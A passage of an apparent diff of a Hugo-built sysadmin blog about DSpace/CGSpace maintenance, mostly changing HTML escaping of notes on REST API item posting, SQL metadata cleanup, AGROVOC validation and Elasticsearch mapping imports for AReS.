&#34;downloads&#34; : 3329,
&#34;id&#34; : &#34;b2c1bbfd-65b0-438c-9e49-d271c49b2696&#34;,
&#34;views&#34; : 1565
},
{
&quot;downloads&quot; : 3797,
&quot;id&quot; : &quot;f44cf173-2344-4eb2-8f00-ee55df32c76f&quot;,
&quot;views&quot; : 48
&#34;downloads&#34; : 3797,
&#34;id&#34; : &#34;f44cf173-2344-4eb2-8f00-ee55df32c76f&#34;,
&#34;views&#34; : 48
},
{
&quot;downloads&quot; : 11064,
&quot;id&quot; : &quot;8542f9da-9ce1-4614-abf4-f2e3fdb4b305&quot;,
&quot;views&quot; : 26
&#34;downloads&#34; : 11064,
&#34;id&#34; : &#34;8542f9da-9ce1-4614-abf4-f2e3fdb4b305&#34;,
&#34;views&#34; : 26
},
{
&quot;downloads&quot; : 6782,
&quot;id&quot; : &quot;2324aa41-e9de-4a2b-bc36-16241464683e&quot;,
&quot;views&quot; : 19
&#34;downloads&#34; : 6782,
&#34;id&#34; : &#34;2324aa41-e9de-4a2b-bc36-16241464683e&#34;,
&#34;views&#34; : 19
},
{
&quot;downloads&quot; : 48,
&quot;id&quot; : &quot;0fe573e7-042a-4240-a4d9-753b61233908&quot;,
&quot;views&quot; : 12
&#34;downloads&#34; : 48,
&#34;id&#34; : &#34;0fe573e7-042a-4240-a4d9-753b61233908&#34;,
&#34;views&#34; : 12
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000e61ca-695d-43e5-9ab8-1f3fd7a67a32&quot;,
&quot;views&quot; : 4
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000e61ca-695d-43e5-9ab8-1f3fd7a67a32&#34;,
&#34;views&#34; : 4
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000dc7cd-9485-424b-8ecf-78002613cc87&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000dc7cd-9485-424b-8ecf-78002613cc87&#34;,
&#34;views&#34; : 1
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000e1616-3901-4431-80b1-c6bc67312d8c&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000e1616-3901-4431-80b1-c6bc67312d8c&#34;,
&#34;views&#34; : 1
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000ea897-5557-49c7-9f54-9fa192c0f83b&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000ea897-5557-49c7-9f54-9fa192c0f83b&#34;,
&#34;views&#34; : 1
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000ec427-97e5-4766-85a5-e8dd62199ab5&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000ec427-97e5-4766-85a5-e8dd62199ab5&#34;,
&#34;views&#34; : 1
}
],
&quot;totalPages&quot; : 13
&#34;totalPages&#34; : 13
}
</code></pre><ul>
<li>I deployed it on DSpace Test and sent a note to Salem so he can test it</li>

View File

@ -44,7 +44,7 @@ During the FlywayDB migration I got an error:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -144,10 +144,10 @@ During the FlywayDB migration I got an error:
</ul>
</li>
</ul>
<pre tabindex="0"><code>2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description='Electronic publishing', internal='FALSE', mimetype='application/epub+zip', short_description='EPUB', support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint &quot;bitstreamformatregistry_short_description_key&quot;
<pre tabindex="0"><code>2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description=&#39;Electronic publishing&#39;, internal=&#39;FALSE&#39;, mimetype=&#39;application/epub+zip&#39;, short_description=&#39;EPUB&#39;, support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint &#34;bitstreamformatregistry_short_description_key&#34;
Detail: Key (short_description)=(EPUB) already exists. Call getNextException to see other errors in the batch.
2020-10-06 21:36:04,138 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: 23505
2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint &quot;bitstreamformatregistry_short_description_key&quot;
2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint &#34;bitstreamformatregistry_short_description_key&#34;
Detail: Key (short_description)=(EPUB) already exists.
2020-10-06 21:36:04,142 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [could not execute batch]
2020-10-06 21:36:04,143 ERROR org.dspace.storage.rdbms.DatabaseRegistryUpdater @ Error attempting to update Bitstream Format and/or Metadata Registries
@ -233,7 +233,7 @@ New item: aff5e78d-87c9-438d-94f8-1050b649961c (10568/108548)
+ Added (dc.title): Testing CUA import NPE
Tue Oct 06 22:06:14 CEST 2020 | Query:containerItem:aff5e78d-87c9-438d-94f8-1050b649961c
Error while updating
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. &lt;!doctype html&gt;&lt;html lang=&quot;en&quot;&gt;&lt;head&gt;&lt;title&gt;HTTP Status 404 Not Found&lt;/title&gt;&lt;style type=&quot;text/css&quot;&gt;body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;HTTP Status 404 Not Found&lt;/h1&gt;&lt;hr class=&quot;line&quot; /&gt;&lt;p&gt;&lt;b&gt;Type&lt;/b&gt; Status Report&lt;/p&gt;&lt;p&gt;&lt;b&gt;Message&lt;/b&gt; The requested resource [/solr/update] is not available&lt;/p&gt;&lt;p&gt;&lt;b&gt;Description&lt;/b&gt; The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.&lt;/p&gt;&lt;hr class=&quot;line&quot; /&gt;&lt;h3&gt;Apache Tomcat/7.0.104&lt;/h3&gt;&lt;/body&gt;&lt;/html&gt;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. &lt;!doctype html&gt;&lt;html lang=&#34;en&#34;&gt;&lt;head&gt;&lt;title&gt;HTTP Status 404 Not Found&lt;/title&gt;&lt;style type=&#34;text/css&#34;&gt;body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;HTTP Status 404 Not Found&lt;/h1&gt;&lt;hr class=&#34;line&#34; /&gt;&lt;p&gt;&lt;b&gt;Type&lt;/b&gt; Status Report&lt;/p&gt;&lt;p&gt;&lt;b&gt;Message&lt;/b&gt; The requested resource [/solr/update] is not available&lt;/p&gt;&lt;p&gt;&lt;b&gt;Description&lt;/b&gt; The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.&lt;/p&gt;&lt;hr class=&#34;line&#34; /&gt;&lt;h3&gt;Apache Tomcat/7.0.104&lt;/h3&gt;&lt;/body&gt;&lt;/html&gt;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:512)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -278,7 +278,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected m
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com 'password=fuuuu'
<pre tabindex="0"><code>$ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com &#39;password=fuuuu&#39;
$ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE
</code></pre><ul>
<li>Then we post an item in JSON format to <code>/rest/collections/{uuid}/items</code>:</li>
@ -287,25 +287,25 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
</code></pre><ul>
<li>Format of JSON is:</li>
</ul>
<pre tabindex="0"><code>{ &quot;metadata&quot;: [
<pre tabindex="0"><code>{ &#34;metadata&#34;: [
{
&quot;key&quot;: &quot;dc.title&quot;,
&quot;value&quot;: &quot;Testing REST API post&quot;,
&quot;language&quot;: &quot;en_US&quot;
&#34;key&#34;: &#34;dc.title&#34;,
&#34;value&#34;: &#34;Testing REST API post&#34;,
&#34;language&#34;: &#34;en_US&#34;
},
{
&quot;key&quot;: &quot;dc.contributor.author&quot;,
&quot;value&quot;: &quot;Orth, Alan&quot;,
&quot;language&quot;: &quot;en_US&quot;
&#34;key&#34;: &#34;dc.contributor.author&#34;,
&#34;value&#34;: &#34;Orth, Alan&#34;,
&#34;language&#34;: &#34;en_US&#34;
},
{
&quot;key&quot;: &quot;dc.date.issued&quot;,
&quot;value&quot;: &quot;2020-09-01&quot;,
&quot;language&quot;: &quot;en_US&quot;
&#34;key&#34;: &#34;dc.date.issued&#34;,
&#34;value&#34;: &#34;2020-09-01&#34;,
&#34;language&#34;: &#34;en_US&#34;
}
],
&quot;archived&quot;:&quot;false&quot;,
&quot;withdrawn&quot;:&quot;false&quot;
&#34;archived&#34;:&#34;false&#34;,
&#34;withdrawn&#34;:&#34;false&#34;
}
</code></pre><ul>
<li>What is unclear to me is the <code>archived</code> parameter, it seems to do nothing&hellip; perhaps it is only used for the <code>/items</code> endpoint when printing information about an item
@ -362,7 +362,7 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http POST http://localhost:8080/rest/login email=aorth@fuuu.com 'password=ddddd'
<pre tabindex="0"><code>$ http POST http://localhost:8080/rest/login email=aorth@fuuu.com &#39;password=ddddd&#39;
$ http http://localhost:8080/rest/status rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099
$ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099 &lt; item-object.json
</code></pre><ul>
@ -408,10 +408,10 @@ $ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
</code></pre><ul>
<li>After a few minutes I saw these four hits in Solr&hellip; WTF
<ul>
@ -483,7 +483,7 @@ dspace=&gt; COMMIT;
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &quot;cg.coverage.country&quot; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &#34;cg.coverage.country&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
COPY 195
</code></pre><ul>
<li>Then use OpenRefine and make a new column for corrections, then use this GREL to convert to title case: <code>value.toTitlecase()</code>
@ -493,7 +493,7 @@ COPY 195
</li>
<li>For the input forms I found out how to do a complicated search and replace in vim:</li>
</ul>
<pre tabindex="0"><code>:'&lt;,'&gt;s/\&lt;\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\&gt;/\u\2\L\3/g
<pre tabindex="0"><code>:&#39;&lt;,&#39;&gt;s/\&lt;\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\&gt;/\u\2\L\3/g
</code></pre><ul>
<li>It uses a <a href="https://jbodah.github.io/blog/2016/11/01/positivenegative-lookaheadlookbehind-vim/">negative lookahead</a> (aka &ldquo;lookaround&rdquo; in PCRE?) to match words that are <em>not</em> &ldquo;pair&rdquo;, &ldquo;displayed&rdquo;, etc because we don&rsquo;t want to edit the XML tags themselves&hellip;
<ul>
@ -509,14 +509,14 @@ COPY 195
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &quot;cg.coverage.region&quot; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &#34;cg.coverage.region&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
COPY 34
</code></pre><ul>
<li>I did the same as the countries in OpenRefine for the database values and in vim for the input forms</li>
<li>After testing the replacements locally I ran them on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -t &#39;correct&#39; -m 228
$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227
</code></pre><ul>
<li>Then I started a full re-indexing:</li>
</ul>
@ -583,14 +583,14 @@ sys 2m22.713s
dspace=&gt; UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57;
UPDATE 335063
dspace=&gt; COMMIT;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.subject&quot;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY &quot;dc.subject&quot; ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.subject&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY &#34;dc.subject&#34; ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER;
COPY 1500
</code></pre><ul>
<li>Use my <code>agrovoc-lookup.py</code> script to validate subject terms against the AGROVOC REST API, extract matches with <code>csvgrep</code>, and then update and format the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 1 /tmp/2020-10-15-top-1500-agrovoc-subject.csv | tail -n 1500 &gt; /tmp/subjects.txt
$ ./agrovoc-lookup.py -i /tmp/subjects.txt -o /tmp/subjects.csv -d
$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed '1d' &gt; dspace/config/controlled-vocabularies/dc-subject.xml
$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed &#39;1d&#39; &gt; dspace/config/controlled-vocabularies/dc-subject.xml
# apply formatting in XML file
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
</code></pre><ul>
@ -614,7 +614,7 @@ sys 2m22.713s
<li>They are using the user agent &ldquo;CCAFS Website Publications importer BOT&rdquo; so they are getting rate limited by nginx</li>
<li>Ideally they would use the REST <code>find-by-metadata-field</code> endpoint, but it is <em>really</em> slow for large result sets (like twenty minutes!):</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;CCAFS Website Publications importer BOT&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100&quot; -d '{&quot;key&quot;:&quot;cg.contributor.crp&quot;, &quot;value&quot;:&quot;Climate Change, Agriculture and Food Security&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;CCAFS Website Publications importer BOT&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100&#34; -d &#39;{&#34;key&#34;:&#34;cg.contributor.crp&#34;, &#34;value&#34;:&#34;Climate Change, Agriculture and Food Security&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>For now I will whitelist their user agent so that they can continue scraping /browse</li>
<li>I figured out that the mappings for AReS are stored in Elasticsearch
@ -624,23 +624,23 @@ sys 2m22.713s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -XPOST &quot;localhost:9200/openrxv-values/_delete_by_query&quot; -H 'Content-Type: application/json' -d'
<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_delete_by_query&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
{
&quot;query&quot;: {
&quot;match&quot;: {
&quot;_id&quot;: &quot;64j_THMBiwiQ-PKfCSlI&quot;
&#34;query&#34;: {
&#34;match&#34;: {
&#34;_id&#34;: &#34;64j_THMBiwiQ-PKfCSlI&#34;
}
}
}
</code></pre><ul>
<li>I added a new find/replace:</li>
</ul>
<pre tabindex="0"><code>$ curl -XPOST &quot;localhost:9200/openrxv-values/_doc?pretty&quot; -H 'Content-Type: application/json' -d'
<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_doc?pretty&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
{
&quot;find&quot;: &quot;ALAN1&quot;,
&quot;replace&quot;: &quot;ALAN2&quot;,
&#34;find&#34;: &#34;ALAN1&#34;,
&#34;replace&#34;: &#34;ALAN2&#34;,
}
'
&#39;
</code></pre><ul>
<li>I see it in Kibana, and I can search it in Elasticsearch, but I don&rsquo;t see it in OpenRXV&rsquo;s mapping values dashboard</li>
<li>Now I deleted everything in the <code>openrxv-values</code> index:</li>
@ -649,12 +649,12 @@ sys 2m22.713s
</code></pre><ul>
<li>Then I tried posting it again:</li>
</ul>
<pre tabindex="0"><code>$ curl -XPOST &quot;localhost:9200/openrxv-values/_doc?pretty&quot; -H 'Content-Type: application/json' -d'
<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_doc?pretty&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
{
&quot;find&quot;: &quot;ALAN1&quot;,
&quot;replace&quot;: &quot;ALAN2&quot;,
&#34;find&#34;: &#34;ALAN1&#34;,
&#34;replace&#34;: &#34;ALAN2&#34;,
}
'
&#39;
</code></pre><ul>
<li>But I still don&rsquo;t see it in AReS</li>
<li>Interesting! I added a find/replace manually in AReS and now I see the one I POSTed&hellip;</li>
@ -683,63 +683,63 @@ sys 2m22.713s
<li>Last night I learned how to POST mappings to Elasticsearch for AReS:</li>
</ul>
<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-Type: application/json&quot; --data-binary @./mapping.json
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @./mapping.json
</code></pre><ul>
<li>The JSON file looks like this, with one instruction on each line:</li>
</ul>
<pre tabindex="0"><code>{&quot;index&quot;:{}}
{ &quot;find&quot;: &quot;CRP on Dryland Systems - DS&quot;, &quot;replace&quot;: &quot;Dryland Systems&quot; }
{&quot;index&quot;:{}}
{ &quot;find&quot;: &quot;FISH&quot;, &quot;replace&quot;: &quot;Fish&quot; }
<pre tabindex="0"><code>{&#34;index&#34;:{}}
{ &#34;find&#34;: &#34;CRP on Dryland Systems - DS&#34;, &#34;replace&#34;: &#34;Dryland Systems&#34; }
{&#34;index&#34;:{}}
{ &#34;find&#34;: &#34;FISH&#34;, &#34;replace&#34;: &#34;Fish&#34; }
</code></pre><ul>
<li>Adjust the report templates on AReS based on some of Peter&rsquo;s feedback</li>
<li>I wrote a quick Python script to filter and convert the old AReS mappings to <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-bulk.html">Elasticsearch&rsquo;s Bulk API</a> format:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/env python3</span>
<span style="color:#f92672">import</span> json
<span style="color:#f92672">import</span> re
f <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#39;/tmp/mapping.json&#39;</span>, <span style="color:#e6db74">&#39;r&#39;</span>)
data <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>load(f)
<span style="color:#75715e"># Iterate over old mapping file, which is in format &#34;find&#34;: &#34;replace&#34;, ie:</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># &#34;alan&#34;: &#34;ALAN&#34;</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># And convert to proper dictionaries for import into Elasticsearch&#39;s Bulk API:</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># { &#34;find&#34;: &#34;alan&#34;, &#34;replace&#34;: &#34;ALAN&#34; }</span>
<span style="color:#75715e">#</span>
<span style="color:#66d9ef">for</span> find, replace <span style="color:#f92672">in</span> data<span style="color:#f92672">.</span>items():
<span style="color:#75715e"># Skip all upper and all lower case strings because they are indicative of</span>
<span style="color:#75715e"># some AGROVOC or other mappings we no longer want to do</span>
<span style="color:#66d9ef">if</span> find<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> find<span style="color:#f92672">.</span>islower() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>islower():
<span style="color:#66d9ef">continue</span>
<span style="color:#75715e"># Skip replacements with acronyms like:</span>
<span style="color:#75715e">#</span>
<span style="color:#75715e"># International Livestock Research Institute - ILRI</span>
<span style="color:#75715e">#</span>
acronym_pattern <span style="color:#f92672">=</span> re<span style="color:#f92672">.</span>compile(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;[A-Z]+$&#34;</span>)
acronym_pattern_match <span style="color:#f92672">=</span> acronym_pattern<span style="color:#f92672">.</span>search(replace)
<span style="color:#66d9ef">if</span> acronym_pattern_match <span style="color:#f92672">is</span> <span style="color:#f92672">not</span> <span style="color:#66d9ef">None</span>:
<span style="color:#66d9ef">continue</span>
mapping <span style="color:#f92672">=</span> { <span style="color:#e6db74">&#34;find&#34;</span>: find, <span style="color:#e6db74">&#34;replace&#34;</span>: replace }
<span style="color:#75715e"># Print command for Elasticsearch</span>
print(<span style="color:#e6db74">&#39;{&#34;index&#34;:</span><span style="color:#e6db74">{}</span><span style="color:#e6db74">}&#39;</span>)
print(json<span style="color:#f92672">.</span>dumps(mapping))
f<span style="color:#f92672">.</span>close()
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> json
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> re
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>f <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#39;/tmp/mapping.json&#39;</span>, <span style="color:#e6db74">&#39;r&#39;</span>)
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>load(f)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Iterate over old mapping file, which is in format &#34;find&#34;: &#34;replace&#34;, ie:</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># &#34;alan&#34;: &#34;ALAN&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># And convert to proper dictionaries for import into Elasticsearch&#39;s Bulk API:</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># { &#34;find&#34;: &#34;alan&#34;, &#34;replace&#34;: &#34;ALAN&#34; }</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> find, replace <span style="color:#f92672">in</span> data<span style="color:#f92672">.</span>items():
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># Skip all upper and all lower case strings because they are indicative of</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># some AGROVOC or other mappings we no longer want to do</span>
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> find<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> find<span style="color:#f92672">.</span>islower() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>islower():
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># Skip replacements with acronyms like:</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># International Livestock Research Institute - ILRI</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span> acronym_pattern <span style="color:#f92672">=</span> re<span style="color:#f92672">.</span>compile(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;[A-Z]+$&#34;</span>)
</span></span><span style="display:flex;"><span> acronym_pattern_match <span style="color:#f92672">=</span> acronym_pattern<span style="color:#f92672">.</span>search(replace)
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> acronym_pattern_match <span style="color:#f92672">is</span> <span style="color:#f92672">not</span> <span style="color:#66d9ef">None</span>:
</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> mapping <span style="color:#f92672">=</span> { <span style="color:#e6db74">&#34;find&#34;</span>: find, <span style="color:#e6db74">&#34;replace&#34;</span>: replace }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># Print command for Elasticsearch</span>
</span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#39;{&#34;index&#34;:</span><span style="color:#e6db74">{}</span><span style="color:#e6db74">}&#39;</span>)
</span></span><span style="display:flex;"><span> print(json<span style="color:#f92672">.</span>dumps(mapping))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>f<span style="color:#f92672">.</span>close()
</span></span></code></pre></div><ul>
<li>It filters all upper and lower case strings as well as any replacements that end in an acronym like &ldquo;- ILRI&rdquo;, reducing the number of mappings from around 4,000 to about 900</li>
<li>I deleted the existing <code>openrxv-values</code> Elasticsearch core and then POSTed it:</li>
</ul>
<pre tabindex="0"><code>$ ./convert-mapping.py &gt; /tmp/elastic-mappings.txt
$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-Type: application/json&quot; --data-binary @/tmp/elastic-mappings.txt
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @/tmp/elastic-mappings.txt
</code></pre><ul>
<li>Then in AReS I didn&rsquo;t see the mappings in the dashboard until I added a new one manually, after which they all appeared
<ul>
@ -762,12 +762,12 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-T
</li>
